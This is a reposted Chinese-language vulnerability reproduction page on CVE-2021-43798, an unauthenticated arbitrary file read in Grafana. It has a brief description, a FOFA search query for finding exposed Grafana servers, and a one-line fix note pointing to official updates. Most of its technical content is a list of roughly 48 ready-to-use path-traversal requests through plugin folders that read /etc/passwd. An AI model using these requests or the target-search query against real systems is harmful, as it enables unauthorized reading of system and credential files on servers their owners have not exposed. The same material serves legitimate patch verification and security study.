码上快乐

相关内容   简体   繁体

Grafana 未授权任意文件读取漏洞

本文转载自  查看原文  2021-12-08 20:07  2561    漏洞复现

漏洞原理:

  Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。

CVE编号:

  CVE-2021-43798

fofa语法:

  app="Grafana"

影响范围:

   Grafana v8.2.6

漏洞复现:

 

因为不知道Grafana安装了什么插件需要模糊测试:

/ public /plugins/alertGroups/../../../../../../../../etc/passwd
/ public /plugins/alertlist/../../../../../../../../etc/passwd
/ public /plugins/alertmanager/../../../../../../../../etc/passwd
/ public /plugins/annolist/../../../../../../../../etc/passwd
/ public /plugins/barchart/../../../../../../../../etc/passwd
/ public /plugins/bargauge/../../../../../../../../etc/passwd
/ public /plugins/canvas/../../../../../../../../etc/passwd
/ public /plugins/cloudwatch/../../../../../../../../etc/passwd
/ public /plugins/dashboard/../../../../../../../../etc/passwd
/ public /plugins/dashlist/../../../../../../../../etc/passwd
/ public /plugins/debug/../../../../../../../../etc/passwd
/ public /plugins/elasticsearch/../../../../../../../../etc/passwd
/ public /plugins/gauge/../../../../../../../../etc/passwd
/ public /plugins/geomap/../../../../../../../../etc/passwd
/ public /plugins/gettingstarted/../../../../../../../../etc/passwd
/ public /plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/ public /plugins/grafana/../../../../../../../../etc/passwd
/ public /plugins/graph/../../../../../../../../etc/passwd
/ public /plugins/graphite/../../../../../../../../etc/passwd
/ public /plugins/heatmap/../../../../../../../../etc/passwd
/ public /plugins/histogram/../../../../../../../../etc/passwd
/ public /plugins/influxdb/../../../../../../../../etc/passwd
/ public /plugins/jaeger/../../../../../../../../etc/passwd
/ public /plugins/live/../../../../../../../../etc/passwd
/ public /plugins/logs/../../../../../../../../etc/passwd
/ public /plugins/loki/../../../../../../../../etc/passwd
/ public /plugins/mixed/../../../../../../../../etc/passwd
/ public /plugins/mssql/../../../../../../../../etc/passwd
/ public /plugins/mysql/../../../../../../../../etc/passwd
/ public /plugins/news/../../../../../../../../etc/passwd
/ public /plugins/nodeGraph/../../../../../../../../etc/passwd
/ public /plugins/opentsdb/../../../../../../../../etc/passwd
/ public /plugins/piechart/../../../../../../../../etc/passwd
/ public /plugins/pluginlist/../../../../../../../../etc/passwd
/ public /plugins/postgres/../../../../../../../../etc/passwd
/ public /plugins/prometheus/../../../../../../../../etc/passwd
/ public /plugins/stat/../../../../../../../../etc/passwd
/ public /plugins/state-timeline/../../../../../../../../etc/passwd
/ public /plugins/status-history/../../../../../../../../etc/passwd
/ public /plugins/ table -old/../../../../../../../../etc/passwd
/ public /plugins/ table /../../../../../../../../etc/passwd
/ public /plugins/tempo/../../../../../../../../etc/passwd
/ public /plugins/testdata/../../../../../../../../etc/passwd
/ public /plugins/text/../../../../../../../../etc/passwd
/ public /plugins/timeseries/../../../../../../../../etc/passwd
/ public /plugins/welcome/../../../../../../../../etc/passwd
/ public /plugins/xychart/../../../../../../../../etc/passwd
/ public /plugins/zipkin/../../../../../../../../etc/passwd

修复建议:

  关注https://grafana.com/ 官方更新。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 Grafana 未授权任意文件读取漏洞 Goby && Grafana未授权任意文件读取 0day ThinkAdminV6未授权列目录、任意文件读取漏洞复现 【漏洞复现】Vmware vcenter未授权任意文件RCE Grafana 任意文件读取漏洞(CVE-2021-43798) 【漏洞复现】ThinkAdmin v5和v6 未授权列目录任意文件读取(CVE-2020-25540) 通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现 通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现 CVE-2021-21972 Vmware vcenter未授权任意文件漏洞分析 Grafana 任意文件读取漏洞 (CVE-2021-43798)学习
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM